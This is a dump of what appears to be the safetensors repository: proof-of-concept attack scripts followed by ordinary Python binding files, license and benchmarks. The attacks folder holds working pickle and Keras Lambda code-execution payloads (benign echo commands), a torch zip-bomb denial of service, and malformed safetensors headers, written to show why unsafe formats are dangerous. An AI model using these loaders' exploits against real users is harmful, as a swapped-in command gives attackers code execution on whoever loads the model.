8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | archive = np.load(filename)
13 | weights = archive["weight"]
14 | assert np.allclose(weights, np.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_create.py:
--------------------------------------------------------------------------------
1 | import paddle
2 | import numpy as np
3 | from collections import Iterable, OrderedDict
4 |
5 | def _parse_every_object(obj, condition_func, convert_func):
6 | if condition_func(obj):
7 | return convert_func(obj)
8 | elif isinstance(obj, (dict, OrderedDict, list)):
9 | if isinstance(obj, list):
10 | keys = range(len(obj))
11 | else:
12 | keys = list(obj.keys())
13 | for key in keys:
14 | if condition_func(obj[key]):
15 | obj[key] = convert_func(obj[key])
16 | else:
17 | obj[key] = _parse_every_object(
18 | obj[key], condition_func, convert_func
19 | )
20 | return obj
21 | elif isinstance(obj, tuple):
22 | return tuple(
23 | _parse_every_object(list(obj), condition_func, convert_func)
24 | )
25 | elif isinstance(obj, set):
26 | object(list(obj), condition_func, convert_func)
27 | else:
28 | return obj
29 |
30 | # hack _parse_every_object method
31 | paddle.framework.io._parse_every_object = _parse_every_object
32 |
33 | class BadDict(dict):
34 | def __init__(self, src: str, **kwargs):
35 | super().__init__(**kwargs)
36 | self.src = src
37 |
38 | def __reduce__(self):
39 | return (
40 | eval,
41 | (f"os.system('{self.src}') or dict()",),
42 | None,
43 | None,
44 | iter(self.items()),
45 | )
46 |
47 | paddle.save(
48 | [BadDict(
49 | 'echo "pwned your computer, I can do anything I want."',
50 | **{"weight": paddle.zeros((2, 2))},
51 | )],
52 | "paddle_ace.pdparams",
53 | )
54 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import paddle
2 |
3 | weights = paddle.load("paddle_ace.pdparams")[0]
4 | assert list(weights.keys()) == ["weight"]
5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_1.py:
--------------------------------------------------------------------------------
1 | import torch
2 | from safetensors.torch import load_file, save_file
3 |
4 | filename = "safetensors_abuse_attempt_1.safetensors"
5 |
6 |
7 | def create_payload():
8 | weights = {"weight": torch.zeros((2, 2))}
9 | save_file(weights, filename)
10 |
11 | with open(filename, "r+b") as f:
12 | f.seek(0)
13 | # Now the header claims 2**32 - xx even though the file is small
14 | n = 1000
15 | n_bytes = n.to_bytes(8, "little")
16 | f.write(n_bytes)
17 |
18 |
19 | create_payload()
20 | # This properly crashes with an out of bounds exception.
21 | test = load_file(filename)
22 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_2.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [2, 2]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {
15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10)
16 | }
17 |
18 | binary = json.dumps(metadata).encode("utf-8")
19 | n = len(binary)
20 | n_header = n.to_bytes(8, "little")
21 |
22 | with open(filename, "wb") as f:
23 | f.write(n_header)
24 | f.write(binary)
25 | f.write(b"\0" * n)
26 |
27 |
28 | create_payload()
29 |
30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
31 | start = datetime.datetime.now()
32 | test = load_file(filename)
33 | print(f"Loading the file took {datetime.datetime.now() - start}")
34 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_3.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [200, 200]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)}
15 |
16 | binary = json.dumps(metadata).encode("utf-8")
17 | n = len(binary)
18 | n_header = n.to_bytes(8, "little")
19 |
20 | with open(filename, "wb") as f:
21 | f.write(n_header)
22 | f.write(binary)
23 | f.write(b"\0" * n)
24 |
25 |
26 | create_payload()
27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
28 | start = datetime.datetime.now()
29 | test = load_file(filename)
30 | print(f"Loading the file took {datetime.datetime.now() - start}")
31 |
--------------------------------------------------------------------------------
/attacks/tf_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | ###
18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
19 |
20 | model.save("tf_ace.h5")
21 | ###
22 |
--------------------------------------------------------------------------------
/attacks/tf_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import json
3 |
4 | import h5py
5 | import tensorflow as tf
6 |
7 | new_model = tf.keras.models.load_model("tf.h5")
8 |
9 | print("Transformers is not vulnerable to this, as it uses h5 directly.")
10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file")
11 | print("Let's show you the marshalled code")
12 |
13 | with h5py.File("tf_ace.h5") as f:
14 | data = json.loads(f.attrs["model_config"])
15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0]))
16 | pass
17 |
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | model.save("tf_ace.keras", save_format="keras_v3")
18 |
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 | new_model = tf.keras.models.load_model("tf_ace.keras")
4 |
--------------------------------------------------------------------------------
/attacks/torch_ace_create.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 |
4 | class BadDict(dict):
5 | def __init__(self, src: str, **kwargs):
6 | super().__init__(**kwargs)
7 | self.src = src
8 |
9 | def __reduce__(self):
10 | return (
11 | eval,
12 | (f"os.system('{self.src}') or dict()",),
13 | None,
14 | None,
15 | iter(self.items()),
16 | )
17 |
18 |
19 | torch.save(
20 | BadDict(
21 | 'echo "pwned your computer, I can do anything I want."',
22 | **{"weight": torch.zeros((2, 2))},
23 | ),
24 | "torch_ace.pt",
25 | )
26 |
--------------------------------------------------------------------------------
/attacks/torch_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 | weights = torch.load("torch_ace.pt")
4 | assert list(weights.keys()) == ["weight"]
5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/attacks/torch_dos_create.py:
--------------------------------------------------------------------------------
1 | import os
2 | from zipfile import ZIP_DEFLATED, ZipFile
3 |
4 | import torch
5 |
6 | FILESIZE = 40 * 1000 # 40 Go
7 | BUFFER = b"\0" * 1000 * 1000 # 1 Mo
8 |
9 | filename = "torch_dos_tmp.pt"
10 | torch.save({"weight": torch.zeros((2, 2))}, filename)
11 |
12 |
13 | with ZipFile(filename, "r") as torch_zip:
14 | outfilename = "torch_dos.pt"
15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read())
17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read())
18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f:
19 | for i in range(FILESIZE):
20 | f.write(BUFFER)
21 |
22 | os.remove(filename)
23 |
--------------------------------------------------------------------------------
/attacks/torch_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import torch
4 |
5 | filename = "torch_dos.pt"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | weights = torch.load(filename)
13 | assert list(weights.keys()) == ["weight"]
14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/bindings/python/.gitignore:
--------------------------------------------------------------------------------
1 | /target
2 |
3 | # Byte-compiled / optimized / DLL files
4 | __pycache__/
5 | .pytest_cache/
6 | *.py[cod]
7 |
8 | # C extensions
9 | *.so
10 |
11 | # Distribution / packaging
12 | .Python
13 | .venv/
14 | env/
15 | bin/
16 | build/
17 | develop-eggs/
18 | dist/
19 | eggs/
20 | lib/
21 | lib64/
22 | parts/
23 | sdist/
24 | var/
25 | include/
26 | man/
27 | venv/
28 | *.egg-info/
29 | .installed.cfg
30 | *.egg
31 |
32 | # Installer logs
33 | pip-log.txt
34 | pip-delete-this-directory.txt
35 | pip-selfcheck.json
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .cache
42 | nosetests.xml
43 | coverage.xml
44 |
45 | # Translations
46 | *.mo
47 |
48 | # Mr Developer
49 | .mr.developer.cfg
50 | .project
51 | .pydevproject
52 |
53 | # Rope
54 | .ropeproject
55 |
56 | # Django stuff:
57 | *.log
58 | *.pot
59 |
60 | .DS_Store
61 |
62 | # Sphinx documentation
63 | docs/_build/
64 |
65 | # PyCharm
66 | .idea/
67 |
68 | # VSCode
69 | .vscode/
70 |
71 | # Pyenv
72 | .python-version
--------------------------------------------------------------------------------
/bindings/python/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-python"
3 | version = "0.5.3-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 |
7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
8 | [lib]
9 | name = "safetensors_rust"
10 | crate-type = ["cdylib"]
11 |
12 | [dependencies]
13 | pyo3 = { version = "0.24", features = ["abi3", "abi3-py38"] }
14 | memmap2 = "0.9"
15 | serde_json = "1.0"
16 |
17 | [dependencies.safetensors]
18 | path = "../../safetensors"
19 |
--------------------------------------------------------------------------------
/bindings/python/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/bindings/python/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include Cargo.toml
2 | include pyproject.toml
3 | include rust-toolchain
4 | include ../../LICENSE
5 | recursive-include src *
6 | recursive-include safetensors-lib *
7 | recursive-exclude safetensors-lib/target *
8 |
--------------------------------------------------------------------------------
/bindings/python/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples
2 |
3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!)
4 | export PYTHONPATH = src
5 |
6 | check_dirs := tests py_src
7 |
8 | modified_only_fixup:
9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs)))
10 | @if test -n "$(modified_py_files)"; then \
11 | echo "Checking/fixing $(modified_py_files)"; \
12 | black --preview $(modified_py_files); \
13 | isort $(modified_py_files); \
14 | flake8 $(modified_py_files); \
15 | else \
16 | echo "No library .py files were modified"; \
17 | fi
18 |
19 |
20 | quality:
21 | black --check --preview $(check_dirs)
22 | isort --check-only $(check_dirs)
23 | flake8 $(check_dirs)
24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source
25 |
26 | style:
27 | black --preview $(check_dirs)
28 | isort $(check_dirs)
29 |
30 | # Super fast fix and check target that only works on relevant modified files since the branch was made
31 |
32 | fixup: modified_only_fixup
33 |
34 | test:
35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/
36 |
--------------------------------------------------------------------------------
/bindings/python/README.md:
--------------------------------------------------------------------------------
1 | ## Installation
2 |
3 | ```
4 | pip install safetensors
5 | ```
6 |
7 |
8 | ## Usage
9 |
10 | ### Numpy
11 |
12 | ```python
13 | from safetensors.numpy import save_file, load_file
14 | import numpy as np
15 |
16 | tensors = {
17 | "a": np.zeros((2, 2)),
18 | "b": np.zeros((2, 3), dtype=np.uint8)
19 | }
20 |
21 | save_file(tensors, "./model.safetensors")
22 |
23 |
24 | # Now loading
25 | loaded = load_file("./model.safetensors")
26 | ```
27 |
28 | ### Torch
29 |
30 | ```python
31 | from safetensors.torch import save_file, load_file
32 | import torch
33 |
34 | tensors = {
35 | "a": torch.zeros((2, 2)),
36 | "b": torch.zeros((2, 3), dtype=torch.uint8)
37 | }
38 |
39 | save_file(tensors, "./model.safetensors")
40 |
41 |
42 | # Now loading
43 | loaded = load_file("./model.safetensors")
44 | ```
45 |
46 | ### Developing
47 |
48 | ```
49 | # inside ./safetensors/bindings/python
50 | pip install .[dev]
51 | ```
52 | Should be enough to install this library locally.
53 |
54 | ### Testing
55 |
56 | ```
57 | # inside ./safetensors/bindings/python
58 | pip install .[dev]
59 | pytest -sv tests/
60 | ```
61 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import jax.numpy as jnp
5 | from flax.serialization import msgpack_restore, msgpack_serialize
6 | from safetensors.flax import load_file, save_file
7 |
8 |
9 | def create_gpt2(n_layers: int):
10 | tensors = {}
11 | tensors["wte"] = jnp.zeros((50257, 768))
12 | tensors["wpe"] = jnp.zeros((1024, 768))
13 | for i in range(n_layers):
14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,))
15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,))
16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024))
17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304))
18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304))
19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768))
20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768))
21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768))
22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768))
23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072))
24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072))
25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768))
26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768))
27 | tensors["ln_f.weight"] = jnp.zeros((768))
28 | tensors["ln_f.bias"] = jnp.zeros((768))
29 | return tensors
30 |
31 |
32 | def load(filename):
33 | with open(filename, "rb") as f:
34 | data = f.read()
35 | flax_weights = msgpack_restore(data)
36 | return flax_weights
37 |
38 |
39 | def test_flax_flax_load(benchmark):
40 | # benchmark something
41 | weights = create_gpt2(12)
42 | with tempfile.NamedTemporaryFile(delete=False) as f:
43 | serialized = msgpack_serialize(weights)
44 | f.write(serialized)
45 | result = benchmark(load, f.name)
46 | os.unlink(f.name)
47 |
48 | for k, v in weights.items():
49 | tv = result[k]
50 | assert jnp.allclose(v, tv)
51 |
52 |
53 | def test_flax_sf_load(benchmark):
54 | # benchmark something
55 | weights = create_gpt2(12)
56 | with tempfile.NamedTemporaryFile(delete=False) as f:
57 | save_file(weights, f.name)
58 | result = benchmark(load_file, f.name)
59 | os.unlink(f.name)
60 |
61 | for k, v in weights.items():
62 | tv = result[k]
63 | assert jnp.allclose(v, tv)
64 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | import platform
3 | import tempfile
4 |
5 |
6 | if platform.system() == "Darwin":
7 | import mlx.core as mx
8 | from safetensors.mlx import load_file, save_file
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = mx.zeros((50257, 768))
13 | tensors["wpe"] = mx.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768))
28 | tensors["ln_f.weight"] = mx.zeros((768))
29 | tensors["ln_f.bias"] = mx.zeros((768))
30 | return tensors
31 |
32 | def load(filename):
33 | return mx.load(filename)
34 |
35 | def test_mlx_mlx_load(benchmark):
36 | # benchmark something
37 | weights = create_gpt2(12)
38 | with tempfile.NamedTemporaryFile(delete=False) as f:
39 | filename = f"{f.name}.npz"
40 | mx.savez(filename, **weights)
41 | result = benchmark(load, filename)
42 | os.unlink(f.name)
43 |
44 | for k, v in weights.items():
45 | tv = result[k]
46 | assert mx.allclose(v, tv)
47 |
48 | def test_mlx_sf_load(benchmark):
49 | # benchmark something
50 | weights = create_gpt2(12)
51 | with tempfile.NamedTemporaryFile(delete=False) as f:
52 | save_file(weights, f.name)
53 | result = benchmark(load_file, f.name)
54 | os.unlink(f.name)
55 |
56 | for k, v in weights.items():
57 | tv = result[k]
58 | assert mx.allclose(v, tv)
59 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import numpy as np
5 |
6 | import paddle
7 | from safetensors.paddle import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = paddle.zeros((50257, 768))
13 | tensors["wpe"] = paddle.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,))
22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,))
23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,))
28 | tensors["ln_f.weight"] = paddle.zeros((768,))
29 | tensors["ln_f.bias"] = paddle.zeros((768,))
30 | return tensors
31 |
32 |
33 | def test_paddle_paddle_load(benchmark):
34 | # benchmark something
35 | weights = create_gpt2(12)
36 | with tempfile.NamedTemporaryFile(delete=False) as f:
37 | paddle.save(weights, f.name)
38 | result = benchmark(paddle.load, f.name)
39 | os.unlink(f.name)
40 |
41 | for k, v in weights.items():
42 | tv = result[k]
43 | assert paddle.allclose(v, tv)
44 |
45 |
46 | def test_paddle_sf_load(benchmark):
47 | # benchmark something
48 | weights = create_gpt2(12)
49 | with tempfile.NamedTemporaryFile(delete=False) as f:
50 | save_file(weights, f.name)
51 | result = benchmark(load_file, f.name)
52 | os.unlink(f.name)
53 |
54 | for k, v in weights.items():
55 | tv = result[k]
56 | assert np.allclose(v, tv)
57 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_pt.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import pytest
5 | import torch
6 |
7 | from safetensors.torch import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = torch.zeros((50257, 768))
13 | tensors["wpe"] = torch.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304))
